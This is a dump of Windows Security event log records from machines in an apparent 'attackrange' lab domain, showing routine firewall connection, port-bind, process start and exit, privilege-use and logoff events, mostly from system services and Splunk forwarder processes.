04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278834
Keywords=Audit Failure
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: Security Account Manager
Service Name: Security Account Manager
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887237
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1271
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887236
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1271
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887235
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x10ac
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Exit Status: 0x1
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887234
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1270
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887233
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1270
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887232
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1269
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887231
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1269
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887230
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10ac
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887229
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1268
Destination Address: 52.247.37.26
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887228
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1268
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887227
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 55529
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887226
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 58083
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887225
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887224
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887223
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1267
Destination Address: 69.192.193.125
Destination Port: 80
Protocol: 6
Filter Information:
Filter Run-Time ID: 70378
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887222
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1267
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887221
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 54143
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887220
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 61323
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887219
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 61323
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887218
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61323
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:47 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887217
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 61323
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278888
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 57659
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278887
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::e939:94d:a3e8:982d
Source Port: 57659
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67346
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278886
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 57659
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278885
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 57659
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278884
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 56934
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278883
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::e939:94d:a3e8:982d
Source Port: 56934
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 67346
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278882
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56934
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278881
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56934
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278880
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278879
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 58319
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278878
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58319
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278877
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58319
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278876
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 55007
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278875
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55007
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278874
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 55007
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278873
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53912
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278872
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1780
Process Name: C:\Windows\System32\csrss.exe
Exit Status: 0x0
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278871
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x142c
New Process Name: C:\Windows\System32\dllhost.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80}
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278870
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1108
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53911
Destination Address: 13.91.16.64
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278869
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 56153
Destination Address: 10.0.1.14
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278868
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56153
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278867
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 480
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 56153
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278866
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xbf4
New Process Name: C:\Windows\System32\taskhostw.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x454
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: taskhostw.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278865
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Exit Status: 0x0
04/19/2021 06:27:48 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=278864
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
